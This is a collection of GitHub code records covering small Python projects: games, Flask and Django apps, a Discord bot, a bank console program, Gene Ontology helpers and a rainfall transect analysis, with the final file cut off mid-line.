+{"seq_id":"28887499632","text":"from Game import *\ngame = Game()\n\n# This module functions as the driver for the game.\nwhile game.gamestatus() is False:\n print(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\")\n game.displaymap()\n print(\"\\n What would you like to do? \")\n print(\" You can move up 'u', down 'd', left 'l', and right 'r'\")\n ui = input(\"\\n\\tEnter your choice: \")\n game.moveplayer(ui)\n if game.checkplayerathouse():\n game.startbattle()\n game.checkwin()\nif game._gamewon is True:\n print(\"You won!\")\nelse:\n print(\"You lost!\")","repo_name":"Starskii/HalloweenRPG","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29879644436","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\n\nlsbgs = 'random_LSBGs_all.csv'\nartifacts_2 = 'random_negative_all_2.csv'\n\n# load csv\ndf_lsbgs = pd.read_csv(lsbgs)\ndf_artifacts_2 = pd.read_csv(artifacts_2)\ncols = ['ra', 'dec']\n\n# drop unwanted cols\ndf_lsbgs = df_lsbgs[cols]\ndf_artifacts_2 = df_artifacts_2[cols]\n\n# set labels\ndf_lsbgs['label'] = 1\ndf_artifacts_2['label'] = 0\n\n# concatenate and shuffle final dataframe\ndf = pd.concat([df_lsbgs, df_artifacts_2])\ndf = df.sample(frac=1).reset_index(drop=True)\n\n# splt train, validation and test sets according to Tanoglidis\ndf_train, df_other = train_test_split(df, test_size=0.25)\ndf_val, df_test = train_test_split(df_other, test_size=0.5)\n\nprint('train:\\n', df_train['label'].value_counts(), '\\n')\nprint('val:\\n', df_val['label'].value_counts(), '\\n')\nprint('test:\\n', df_test['label'].value_counts(), '\\n')\n\ndf_train.to_csv('train.csv')\ndf_val.to_csv('val.csv')\ndf_test.to_csv('test.csv')\n","repo_name":"zysymu/Deepfuse","sub_path":"data/prepare_csv.py","file_name":"prepare_csv.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"3649392477","text":"from datetime import datetime\nfrom flask import jsonify, make_response, abort\n\nARRAY_PRODUTOS = {\n \"1\": {\n \"NomeDoProduto\": \"Arroz\",\n \"ID\": \"1\",\n \"Valor\": \"5\",\n \"IdCategoria\": \"1\",\n },\n \"2\": {\n \"NomeDoProduto\": \"Detergente\",\n \"ID\": \"2\",\n \"Valor\": \"3\",\n \"IdCategoria\": \"2\",\n },\n \"3\": {\n \"NomeDoProduto\": \"Camiseta\",\n \"ID\": \"3\",\n \"Valor\": \"30\",\n \"IdCategoria\": \"3\",\n },\n}\n\ndef read_all():\n dict_produtos = [ARRAY_PRODUTOS[key] for key in sorted(ARRAY_PRODUTOS.keys())]\n produtos = jsonify(dict_produtos)\n qtd = len(dict_produtos)\n content_range = \"produtos 0-\"+str(qtd)+\"/\"+str(qtd)\n # Configura headers\n produtos.headers['Access-Control-Allow-Origin'] = '*'\n produtos.headers['Access-Control-Expose-Headers'] = 'Content-Range'\n produtos.headers['Content-Range'] = content_range\n return produtos\n\ndef read_one(ID):\n if ID in ARRAY_PRODUTOS:\n produto = ARRAY_PRODUTOS.get(ID)\n else:\n abort(\n 404, \"Person with ID {ID} not found\".format(ID=ID)\n )\n return produto\n\n\ndef create(produto):\n NomeDoProduto = produto.get(\"NomeDoProduto\", None)\n ID = produto.get(\"ID\", None)\n Valor = produto.get(\"Valor\", None)\n IdCategoria = produto.get(\"IdCategoria\",None)\n\n if ID not in ARRAY_PRODUTOS and ID is not None:\n ARRAY_PRODUTOS[ID] = {\n \"NomeDoProduto\": NomeDoProduto,\n \"ID\": ID,\n \"Valor\": Valor,\n \"IdCategoria\": IdCategoria,\n }\n return make_response(\n \"{ID} successfully created\".format(ID=ID), 201\n )\n else:\n abort(\n 406,\n \"Produto com ID {ID} ja existe\".format(ID=ID),\n )\n\n\ndef update(ID,produto):\n if ID in ARRAY_PRODUTOS:\n ARRAY_PRODUTOS[ID][\"ID\"] = produto.get(\"ID\")\n ARRAY_PRODUTOS[ID][\"Valor\"] = produto.get(\"Valor\")\n ARRAY_PRODUTOS[ID][\"NomeDoProduto\"] = produto.get(\"NomeDoProduto\")\n ARRAY_PRODUTOS[ID][\"IdCategoria\"] = produto.get(\"IdCategoria\")\n return ARRAY_PRODUTOS[ID]\n else:\n abort(\n 404, \"Produto com ID {ID} nao encontrada\".format(ID=ID)\n )\n\ndef delete(ID):\n if ID in ARRAY_PRODUTOS:\n del ARRAY_PRODUTOS[ID]\n return make_response(\n \"{ID} deletado com sucesso\".format(ID=ID), 200\n )\n else:\n abort(\n 404, \"Produto com ID {ID} nao encontrada\".format(ID=ID)\n )","repo_name":"EspeditoJunior/trabalhoDocker","sub_path":"projeto mercado inteligente/mercado_venv/mercado_inteligente/produtos.py","file_name":"produtos.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41295686844","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\n\nfrom os import path\n\nimport website.settings as settings\nfrom .models import Upload, Output\nfrom .forms import DocumentForm, handle_uploaded_file\n\n# Create your views here.\ndef index(request):\n\tif request.method == 'POST' and request.FILES:\n\t\tform = DocumentForm(request.POST, request.FILES)\n\t\tif form.is_valid():\n\t\t\ttry:\n\t\t\t\tuploaded_file = request.FILES['file']\n\t\t\t\tfile = Upload(document=uploaded_file, file_name=uploaded_file.name)\n\t\t\t\tfile.save()\n\t\t\t\tnew_doc = handle_uploaded_file(uploaded_file)\n\t\t\t\toutput_file = Output(document=new_doc, file_name=new_doc.name, original_file=file)\n\t\t\t\toutput_file.save()\n\t\t\t\treturn HttpResponseRedirect(f'download/{output_file.id}')\n\t\t\texcept:\n\t\t\t\treturn a\n\n\telse:\n\t\tform = DocumentForm()\n\tlatest_uploads = Upload.objects.order_by('-uploaded_at')[:10]\n\tcontext = {\n\t\t'latest_uploads': latest_uploads,\n\t\t'form': form\n\t}\n\treturn render(request, 'converter/index.html', context)\n\ndef download(request, file_id):\n\tfile = get_object_or_404(Output, pk=file_id)\n\trelative_path = f'{file.document}'\n\tfile_path = path.join(settings.MEDIA_ROOT, relative_path)\n\tif path.exists(file_path):\n\t\twith open(file_path, 'rb') as fh:\n\t\t\tresponse = HttpResponse(fh.read(), content_type='application/vnd.ms-excel')\n\t\t\tresponse['Content-Disposition'] = 'inline; filename=' + path.basename(file_path)\n\t\t\treturn response\n\treturn render(request, 'converter/result.html', { 'file': file })\n","repo_name":"ativadev/converter-ofx-xlsx","sub_path":"website/converter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29877056568","text":"import discord\nfrom discord.ext import commands, tasks\nfrom discord.ext.commands import AutoShardedBot\nfrom secrect import Secret\nimport os, datetime\nimport asyncio\n\nbot = discord.Client()\n\n@bot.event\nasync def on_ready():\n print(\"Bot on\")\n print(bot.user.name)\n print(bot.user.id)\n game = discord.Game(\"peças fora\")\n loopcanal.start()\n await bot.change_presence(status=discord.Status.idle, activity=game)\n\n\n@tasks.loop(minutes=1)\nasync def loopcanal():\n dia_horas = datetime.datetime.now()\n canal = bot.get_channel(id=826089258375708702) #<-- id do canal que vei mandar as messg\n await canal.send(f\"** `{dia_horas.day}`d | `{dia_horas.hour}`h :`{dia_horas.minute}`m **\")\n\n\nif __name__ == \"__main__\":\n \n bot.run(Secret)\n","repo_name":"Gabriel-bits/Bot-discord_Test","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5989754352","text":"import threading\nimport time\n\n\ndef test1():\n for i in range(5):\n print(\"-----test1---%d---\" % i)\n\n\ndef test2():\n for i in range(5):\n print(\"-----test2---%d---\" % i)\n\n\ndef main():\n t1 = threading.Thread(target=test1)\n t2 = threading.Thread(target=test2)\n\n t1.start()\n\n time.sleep(1)\n print(\"---1---\")\n\n t2.start()\n\n time.sleep(1)\n print(\"---2---\")\n\n print(threading.enumerate())\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"Shadowalker1995/Advanced-Python-Tutorial","sub_path":"03-多任务-线程/03-让某些线程先执行.py","file_name":"03-让某些线程先执行.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"10962238264","text":"\"\"\"\n Player class\n\n Handles everything related to move selection by the bot or the human player.\n\"\"\"\n\nfrom bot.minimax import minimax_soft_alpha_beta, get_depth\nimport random\nfrom math import inf\n\n\nclass Player:\n \"\"\"\n Player class\n\n A player can be a human or bot.\n \"\"\"\n def __init__(self, bot, state, mark):\n \"\"\"\n Constructor for Person class.\n\n :param bot: type: bool\n True if the player is a bot, else False for human player\n\n :param state: type: int\n Integer representing the player's state (0 or 1 or 2)\n 0 - BLANK_STATE\n 1 - HUMAN_STATE\n 2 - BOT_STATE\n\n :param mark: type: str\n String representing the player's mark. (Noughts or crosses) (X or O)\n \"\"\"\n self._bot = bot\n self._state = state\n self._mark = mark\n\n @property\n def bot(self):\n return self._bot\n\n @property\n def state(self):\n return self._state\n\n @property\n def mark(self):\n return self._mark\n\n @staticmethod\n def convert_index_to_move(index):\n \"\"\"\n Converts user input index (1-9) into move indexes. (<row_index>, <column_index>)\n\n :param index: type: int\n User input selected move index (1-9)\n\n :return: type: tuple\n Selected move index in numpy array format (<row_index>, <column_index>)\n \"\"\"\n index_to_move_dict = {\n 1: (0, 0),\n 2: (0, 1),\n 3: (0, 2),\n 4: (1, 0),\n 5: (1, 1),\n 6: (1, 2),\n 7: (2, 0),\n 8: (2, 1),\n 9: (2, 2)\n }\n\n return index_to_move_dict[index]\n\n def make_move(self, board):\n \"\"\"\n Calls the minimax algorithm if the player is a bot, else request user input for human player.\n\n :param board: type: numpy.ndarray\n The current state of the Tic Tac Toe board game\n Input for the minimax algorithm to find the optimal move\n\n :return: type: tuple\n Selected move index in numpy array format (<row_index>, <column_index>)\n \"\"\"\n if self._bot:\n # Minimax algorithm\n _, moves = minimax_soft_alpha_beta(board, get_depth(board), True, -inf, +inf)\n move = random.choice(moves)\n else:\n # Prompt the user to select a move\n index = input(\"Enter move: \")\n move = Player.convert_index_to_move(int(index))\n\n return move\n","repo_name":"ao9000/tic-tac-toe-ai","sub_path":"game/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72008460005","text":"import cx_Oracle\n\ntry:\n con = cx_Oracle.connect('system/theja2020@localhost:8095/ORCLCDB')\n cursor = con.cursor()\n print('Connected')\n\nexcept cx_Oracle.DatabaseError as e:\n if con:\n con.rollback()\n print('PROBLEM', e)\nfinally:\n if cursor:\n cursor.close()\n if con:\n con.close()\n\n# Connected\n","repo_name":"ksrntheja/08-Python-Core","sub_path":"venv/pdbc/Oracle00Template.py","file_name":"Oracle00Template.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11553002531","text":"#AAj Apun Baneyge Apna Personal Bank\n\nclass bank:\n print(\"WELCOME TO PYTHON BANK\")\n\n print(\"Enter YOUR NAME TO START TRANSACTION\")\n##THIS BLOCK OF CODE WILL CHECK IF THE USER EXIST IF NOT IT WILL ASK TO REGISTER IF USER NOT EXIST\n#THIS WILL ACCEPT SINGLE STR_VALUE FROM THE USER\n def enter_name(self, name):\n user = ['vishal', 'nilesh', 'kanishka', 'ananya']\n self.user_name = name\n self.balance = 1000\n if self.user_name in user:\n print(\"Hello\", self.user_name, \"What Kind Of transaction Would You Like To Do\")\n else:\n print(\"User Not Found Error 404\")\n print(\"Press 1 To Register Yourself OR\",\"Any Other Number To Exist\")\n ent = int(input())\n if ent == 1:\n print(\"Hi My Name Is Mohit Chouchan \\n\", \"PLEASE Enter Your Name To Create a Account\")\n new_user = input()\n user.append(new_user)\n print(new_user,\"Your Account Is Created Sucessfully Happy Banking\")\n else:\n exit()\n#THIS BLOCK OF CODE WILL DISPLAY THE OPTION WHICH USER CAN PERFORM\n def menu(self):\n print(\"1 For Deposit/Withdraw\")\n print(\"2 For Check Balance\")\n print(\"3 For Add Benificary\")\n print(\"4 For Transfer\")\n\n\n#IF USER SELECT OPTION 1 THE THIS BLOCK OF CODE WILL RUN IT WILL ACCEPT TWO VALUES FROM THE USER\n#1 STR_VALUE AND 2 INT_VALUE SPACE SEPRATED USER CAN DEPOSIT OR WITHDRAW FROM HIS ACCOUNT\n def given_option1(self,trans_type,amount):\n self.user_trans = trans_type\n #self.user_amount = amount\n if self.user_trans == 'credit': #USER HAS TO ENTER CREDIT TO DEPOSIT\n self.balance = self.balance + int(amount)\n elif self.user_trans == 'debit': #USER HAS TO ENTER DEBIT TO WITHDRAW\n self.balance = self.balance - int(amount)\n else: #IF ANY OTHER VALUE GIVEN USER WILL GET THIS BELOW MESSAGE\n print(\"Enter Correct Transaction Type\")\n\n#USER CAN ADD BENIFICARY TO HIS ACCOUNT IF HE WANTS TO MAKE ANY TRANSFER OF MONEY THIS WILL ACCEPT 1 STR_VALUE\n def add_benificary(self,name):\n list_of_benificary = ['atul','shubham']\n self.benificary_name = name\n if self.benificary_name not in list_of_benificary: #IF THE BENICIARY NOT IN LIST IT WILL ADD BENIFICARY\n list_of_benificary.append(self.benificary_name) #AND DISPLAY SUCESSFUL MESSAGE\n print(\"Benificary\",self.benificary_name,\"Added Sucesfully\\n\"\"Benificary In Your Ac are\",list_of_benificary)\n else: #IF BENIFICARY ALREADY EXISTS IT WILL DISBLAY BELOW MESSAGE\n print(\"Benificary\",self.benificary_name,\"Already Exist\\n\"\"Benificary In Your Ac are\",list_of_benificary)\n return list_of_benificary\n\n\nopenbank = bank()\nopenbank.enter_name(input())\nopenbank.menu()\nwhile(True): #THE LOOP WILL RUN UNTIL THE USER WANTS TO STOP THE LOOP SO USER CAN DO CONTINUES TRANSACTION\n choice = int(input()) #ASK THE USER TO ENTER THE TRANSACTION NUMBER 1,2,3,4\n if choice == 1: #IF 1 USER WILL BE ALLOWED TO DO CREDIT AND DEBIT IN HIS ACCOUNT\n print(\"For Deposit Enter credit and amount --- For Withdraw Enter debit and amount\")\n len_den , paisa = input().split()\n openbank.given_option1(len_den,paisa) #HERE ATTRIBUTE IS CALL WHICH IS IN CLASS BANK TO MAKE CREDIT DEBIT\n print(\"Your Acount Balance After Current Transaction is\",openbank.balance) #DISPLAY THE BALANCE OF THE AC\n print(\"Will You Like To Do Another Transaction Y/N\")\n more = input() #IF USER WANTS TO DO MORE TRANSACTION HE HAS TO ENTER Y OR TO STOP ENTER N\n if more == 'Y':\n openbank.menu()\n continue\n else:\n exit()\n\n elif choice == 2:#IF 2 USER CAN CHECK HIS ACCOUNT BALANCE\n print(\"Your Acount Balance After is\", openbank.balance)\n print(\"Will You Like To Do Another Transaction Y/N\")\n more = input()#IF USER WANTS TO DO MORE TRANSACTION HE HAS TO ENTER Y OR TO STOP ENTER N\n if more == 'Y':\n openbank.menu()\n continue\n else:\n exit()\n\n elif choice == 3:#IF 3 USER CAN ADD BENIFICARY TO HIS ACCOUNT TO MAKE TRANSACTION\n print(\"Enter The Name Of The Benificary You Want To Add\")\n openbank.add_benificary(input())#ATTRIBUTE TO ADD_BENIFICARY IS CALL IN CLASS BANK\n print(\"Will You Like To Do Another Transaction Y/N\")\n more = input()#IF USER WANTS TO DO MORE TRANSACTION HE HAS TO ENTER Y OR TO STOP ENTER N\n if more == 'Y':\n openbank.menu()\n continue\n else:\n exit()\n\n elif choice == 4: #IF 4 USER CAN TRANSFER AMOUNT TO THE BENIFICARY IN LIST\n print(\"Enter The Benificary Name and Amount To Transfer \")\n ben_name, trans_amount = input().split() #THIS WILL ACCEPT 2 VALUE FROM USER STR AND INT SPACE SEPRATED\n return_value = openbank.add_benificary(ben_name).copy()#THIS WILL GET THE COPY OF BENIFIFCIARY LIST\n # AND CHECK IF THE BENFICIARY IS AVILABLE OR NOT\n # IF NOT IT WILL ADD THE BENIFIFCIARY IN THE LIST\n#THIS BELOW CODE WILL CHECK IF THE SUFFICENT BALANCE IS AVIALBLE\n# IN THE USER ACCOUNT OR NOT AND ACCORDINGLY GIVE THE MESSAGE\n if openbank.balance < int(trans_amount):#LESS BALANCE\n print(\"No Sufficent Balance Please Deposit Some Money\",\"\\n Click On Y TO Proceed\")\n more = input()#IF USER WANTS TO DO MORE TRANSACTION HE HAS TO ENTER Y OR TO STOP ENTER N\n if more == 'Y':\n openbank.menu()\n continue\n else:\n exit()\n if openbank.balance > int(trans_amount):#HAVE BALANCE DO SUCESSFUL TRANSACTION\n openbank.balance = openbank.balance - int(trans_amount)\n print(int(trans_amount),\"Got Transfered Sucessfully To\",ben_name,\"\\n Your Current Balance is\",openbank.balance)\n print(\"Will You Like To Do Another Transaction Y/N\")\n more = input()\n if more == 'Y':#IF USER WANTS TO DO MORE TRANSACTION HE HAS TO ENTER Y OR TO STOP ENTER N\n openbank.menu()\n continue\n else:\n exit()\n if openbank.balance == int(trans_amount):#GIVES WARRNING AFTER THIS TRANSACTION USER AC_BAL WILL BE ZERO\n # SO ASK FOR THE CONFIRMATION STILL WOULD HE LIKE TO DO OR NOT\n #IF CUSTOMER DECLINES THE TRANSFER IS CNCELLED\n print(\"WARNING After This Transaction Your Account Balance Will Be Zero Press Y to Continue\")\n confirmation = input()\n if confirmation == 'Y':\n openbank.balance = openbank.balance - int(trans_amount)\n print(int(trans_amount), \"Got Transfered Sucessfully To\", ben_name, \"\\n Your Current Balance is\",\n openbank.balance)\n print(\"Will You Like To Do Another Transaction Y/N\")\n more = input()\n if more == 'Y':#IF USER WANTS TO DO MORE TRANSACTION HE HAS TO ENTER Y OR TO STOP ENTER N\n openbank.menu()\n continue\n else:\n exit()\n else:\n print(\"Transfer Cancelled\")\n print(\"Will You Like To Do Another Transaction Y/N\")\n more = input()\n if more == 'Y':#IF USER WANTS TO DO MORE TRANSACTION HE HAS TO ENTER Y OR TO STOP ENTER N\n openbank.menu()\n continue\n else:\n exit()","repo_name":"vishalg1021997/trial","sub_path":"nawabank.py","file_name":"nawabank.py","file_ext":"py","file_size_in_byte":7786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24897855900","text":"'''\nAmazon interview question -\n\n# Given a log file containing two days of web server logs,\n# find the percentage of users who visited the site on\n# both days. The log file contains the following\n# columns, separated by spaces.\n\n# Date, Operation, Path, User, Status Code\n# 2019-02-02T18:83:03 GET /some/webpage.html ted 200\n# 2019-02-02T18:83:03 GET /some/otherpage.html ted 200\n# 2019-02-02T18:83:03 GET /some/otherwebpage.html sue 200\n# 2019-02-02T18:83:03 GET /some/third.html josh 404\n# 2019-02-03T18:83:03 GET /some/webpage.html ted 200\n\n>>> percentage_users(log_file) = 33.33\n'''\n\nimport csv\n\n\ndef percentage_users(log_file):\n ''':input type file\n :rtype float\n '''\n \n d = {}\n with open(log_file, 'r') as f:\n csvData = csv.reader(f, delimiter = ' ')\n next(csvData) # ignore the first line in the file\n for line in csvData:\n date = line[0].split('T')[0]\n user = line[3]\n print(date, user)\n try:\n d[date].add(user)\n except KeyError:\n d[date] = {user}\n \n print(d) # for debugging\n day1, day2 = d.values()\n both_days = len(day1.intersection(day2))\n total_users = len(day1.union(day2))\n return both_days/total_users * 100\n\n\n\n\nif __name__ == \"__main__\":\n log_file = 'log.txt'\n print('percentage of users visited both days = {} %'.format(percentage_users(log_file)))\n\n","repo_name":"mgokani/pythonPractise","sub_path":"amazonProblem.py","file_name":"amazonProblem.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"29718096400","text":"#!/usr/bin/env python3\n\nimport pickle\nimport logging\nimport lzma\n\ngo_roots = {\n \"biological_process\": \"GO:0008150\",\n \"cellular_component\": \"GO:0005575\",\n \"molecular_function\": \"GO:0003674\"\n}\n\n\nclass GoTerm(object):\n \"\"\"\n A doubly linked list of GO records containing some extra metadata of the\n given GO term.\n \"\"\"\n\n def __init__(self, go_id, go_name=None, go_def=None):\n \"\"\"\n Creates a GO term object.\n\n :type go_id: str\n :param go_id: The unique identifier given to the GO term. This term has\n to be unique and will be used as the hash of this instance.\n\n :type go_name: str\n :param go_name: The name of the GO term.\n\n :type go_def: str\n :param go_def: The definition of the GO term.\n \"\"\"\n if go_id is None:\n raise ValueError(\"go_id cannot be None.\")\n\n self.go_id = go_id\n self.go_name = go_name\n self.go_def = go_def\n self.children = list()\n self.parents = list()\n self.total_offspring = 0\n self.information_content = 0.\n\n def __hash__(self):\n # we assume that go_id is unique for all instances (should be the case anyway)\n return hash(self.go_id)\n\n def __repr__(self):\n return 'GoTerm(go_id=\"{}\", go_name=\"{}\", go_def=\"{}\", children={}, parents={}, total_offspring={}, ' \\\n 'information_content={})' \\\n .format(\n self.go_id, self.go_name, self.go_def, len(self.children), len(self.parents), self.total_offspring,\n self.information_content\n )\n\n def __str__(self):\n return '{} [{}]'.format(\n self.go_id, self.go_name\n )\n\n def __eq__(self, other):\n if not isinstance(other, self.__class__):\n return False\n return self.go_id == other.go_id\n\n def set_name(self, go_name):\n \"\"\"\n Set the name of the GO term.\n\n :type go_name: str\n :param go_name: The new name of the GO term.\n\n :rtype: GoTerm\n :return: This GoTerm instance.\n \"\"\"\n self.go_name = go_name\n return self\n\n def set_definition(self, go_def):\n \"\"\"\n Set the definition of the GO term.\n\n :type go_def: str\n :param go_def: The new definition of the GO term.\n\n :rtype: GoTerm\n :return: This GoTerm instance.\n \"\"\"\n self.go_def = go_def\n return self\n\n def add_parent(self, parent_term):\n \"\"\"\n Add a new parent GO term to this GO term.\n\n :type parent_term: str\n :param parent_term: The ID of the parent GO term.\n\n :rtype: GoTerm\n :return: This GoTerm instance.\n \"\"\"\n if parent_term not in self.parents:\n self.parents.append(parent_term)\n return self\n\n def add_child(self, child_term):\n \"\"\"\n Add a new child GO term to this GO term.\n\n :type child_term: str\n :param child_term: The ID of the child GO term.\n\n :rtype: GoTerm\n :return: This GoTerm instance.\n \"\"\"\n if child_term not in self.children:\n self.children.append(child_term)\n return self\n\n\ndef export_go_tree(go_tree, export_location):\n \"\"\"\n Serialises and compresses the GO tree object into a single file.\n\n :type go_tree: dict[str, GoTerm]\n :param go_tree: The GO dictionary to export.\n\n :type export_location: str\n :param export_location: The location to write the file to.\n \"\"\"\n logging.info(\"Compressing and exporting GO dictionary to %s ...\", export_location)\n with lzma.open(export_location, \"wb\") as f:\n pickle.dump(go_tree, f, protocol=pickle.HIGHEST_PROTOCOL)\n\n\ndef import_go_tree(import_location):\n \"\"\"\n Decompresses and deserialises the given file containing the processed GO\n tree created by create_go_tree.py\n\n :type import_location: str\n :param import_location: File location of the LZMA compressed and pickled\n object.\n\n :rtype: dict[str, GoTerm]\n :return: The deserialised object from the file.\n \"\"\"\n logging.info(\"Decompressing and importing GO dictionary from %s ...\", import_location)\n with lzma.open(import_location, \"rb\") as f:\n return pickle.load(f)\n\n\ndef go_lin_similarity(go_tree, term1, term2):\n \"\"\"\n Calculate Lin's similarity score between two GO terms.\n http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.55.1832&rep=rep1&type=pdf\n\n :type go_tree: dict[str, GoTerm]\n :param go_tree: The GO tree dictionary.\n\n :type term1: str\n :param term1: The first GO term.\n\n :type term2: str\n :param term2: The second GO term.\n\n :rtype: float\n :return: Lin's term similarity score.\n \"\"\"\n intersecting_ancestors = lowest_common_ancestor(go_tree, term1, term2)\n if not intersecting_ancestors:\n return 0.\n lca = intersecting_ancestors.pop()\n # get the LCS with the highest IC\n for term in intersecting_ancestors:\n if go_tree[lca].information_content < go_tree[term].information_content:\n lca = term\n\n # calculate Lin's similarity score\n return 2 * go_tree[lca].information_content / \\\n (go_tree[term1].information_content + go_tree[term2].information_content)\n\n\ndef lowest_common_ancestor(go_tree, term1, term2):\n \"\"\"\n Find the lowest common ancestor (LCA) of all paths in the GO DAG.\n\n :type go_tree: dict[str, GoTerm]\n :param go_tree: The GO tree dictionary.\n\n :type term1: str\n :param term1: The first GO term.\n\n :type term2: str\n :param term2: The second GO term.\n\n :rtype: set[str]\n :return: Set of LCA's found on each possible path.\n \"\"\"\n go_term1 = go_tree[term1]\n go_term2 = go_tree[term2]\n\n if go_term1 == go_term2:\n return {term1}\n\n lca = set()\n # iterate over parents of the most specific node (lower in tree)\n if go_term1.information_content > go_term2.information_content:\n for parent in go_term1.parents:\n subsumer = lowest_common_ancestor(go_tree, parent, go_term2.go_id)\n if not subsumer:\n continue\n lca.update(subsumer)\n else:\n for parent in go_term2.parents:\n subsumer = lowest_common_ancestor(go_tree, go_term1.go_id, parent)\n if not subsumer:\n continue\n lca.update(subsumer)\n\n return lca\n\n\ndef get_all_ancestors(go_tree, go_term, ancestors):\n \"\"\"\n Add all ancestor terms of a given GO term to a list.\n\n :type go_tree: dict[str, GoTerm]\n :param go_tree: The GO tree dictionary.\n\n :type go_term: str\n :param go_term: GO term to find all ancestor terms of.\n\n :type ancestors: set[str]\n :param ancestors: Set where all ancestor terms will be added to. The\n given GO term will also be added to this set.\n \"\"\"\n ancestors.add(go_term)\n for parent in go_tree[go_term].parents:\n get_all_ancestors(go_tree, parent, ancestors)\n\n\ndef get_value_frequency(values_list):\n \"\"\"\n Count the frequency of objects in a list.\n\n :type values_list: list\n :param values_list: List containing the values to count the frequencies of.\n\n :rtype: dict[_KT, int]\n :return: A dictionary containing the values and their counts.\n \"\"\"\n occurrences = dict()\n for term in values_list:\n occurrences[term] = occurrences.get(term, 0) + 1\n return occurrences\n\n\ndef go_lineage_frequencies(go_tree, go_terms):\n \"\"\"\n Calculate how often ancestor terms occur in the given list of GO terms.\n\n :type go_tree: dict[str, GoTerm]\n :param go_tree: The GO tree dictionary.\n\n :type go_terms: list[str]\n :param go_terms: List of GO terms to calculate the ancestor frequencies of.\n\n :rtype: dict[str, int]\n :return: Dictionary containing the frequency of found ancestor GO terms.\n \"\"\"\n lineage_frequency = dict()\n for term in go_terms:\n if term not in go_tree:\n # GO term has been deprecated\n continue\n\n term_lineage = set()\n get_all_ancestors(go_tree, term, term_lineage)\n\n for ancestor in term_lineage:\n lineage_frequency[ancestor] = lineage_frequency.get(ancestor, 0) + 1\n return lineage_frequency\n","repo_name":"ebete/micro-qtl","sub_path":"go_helpers.py","file_name":"go_helpers.py","file_ext":"py","file_size_in_byte":8203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43708057409","text":"# Core \nimport datetime\nimport os\nimport glob\nimport sys\n\n# Analysis \nimport xarray as xr\nimport numpy as np\nimport pyproj as pp\nimport scipy as sp\nimport imp\nimp.load_source('transect_analysis', '/home/563/esh563/goulburn_NT/transect_analysis.py')\nimport transect_analysis as ta\n\n# Specify start and end coords on coast.\n# Choose order so that (transect_axis, coastline_axis) forms a right hand coordinate system\nlon0 = 134.5293 \nlat0 = -12.4715\ncoast_lon1 = 133.3290\ncoast_lat1 = -12.1468\n\ntrans_lon0, trans_lat0, trans_lon1, trans_lat1, n_points, n_trans, coast_distances, tran_distances = ta.define_transects(\n lon0, lat0, coast_lon1, coast_lat1, 453300, spacing = 8*10**3\n)\n\nstatic_path = '/g/data/ua8/ARCCSS_Data/MCASClimate/v1-0/static/static.nc'\nstatic = xr.open_dataset(static_path).sel(latitude=slice(-12.75,-6), longitude=slice(130,139))\nstatic_tran = ta.calc_transects(static, trans_lon0, trans_lat0, trans_lon1, trans_lat1, n_points, n_trans) \nstatic_tran = static_tran.assign_coords(coastal_axis = coast_distances)\nstatic_tran = static_tran.assign_coords(transect_axis = tran_distances)\n\n# Calcualate distance where landmask drops below 0.5\ncoast_i = np.where(static_tran.mean('coastal_axis').LANDMASK.values < 0.5)[0][0] - 1\ncoast_location = tran_distances[coast_i]\n\n# Redefine tran_distances so that coastline occurs at 0.\ntran_distances = tran_distances - coast_location\n\n# Create basis vectors of new coordinate system\nb_lon = trans_lon1[0] - lon0\nb_lat = trans_lat1[0] - lat0\n\n# Iterate over all years\nfor i in range(5, 15):\n\n print('Solving for 20{}'.format(str(i).zfill(2)), end='\\r')\n\n # Caclulate transects for first day of data\n CMORPH_path = '/g/data/ua8/CMORPH/CMORPH_V1.0/netcdf/20{}/pr_30min_CMORPH_V1_20{}1101_20{}1130.nc'.format(\n str(i).zfill(2), str(i).zfill(2), str(i).zfill(2)\n ) \n CMORPH = xr.open_dataset(CMORPH_path).sel(lat = slice(-12.6, -8), lon = slice(132.8, 136.2)).rename({'lat' : 'latitude', 'lon' : 'longitude'}) \n\n CMORPH_tran = ta.calc_transects(CMORPH.pr, trans_lon0, trans_lat0, trans_lon1, trans_lat1, n_points, n_trans)\n \n CMORPH_tran = CMORPH_tran\\\n .assign_coords(coastal_axis = coast_distances)\\\n .assign_coords(transect_axis = tran_distances)\\\n .rename('pr')\n \n save_path_CMORPH = '/g/data/w40/esh563/goulburn_NT/transects/CMORPH_goulburn_20{}11.nc'.format(str(i).zfill(2))\n CMORPH_tran.to_netcdf(path=save_path_CMORPH, mode='w', 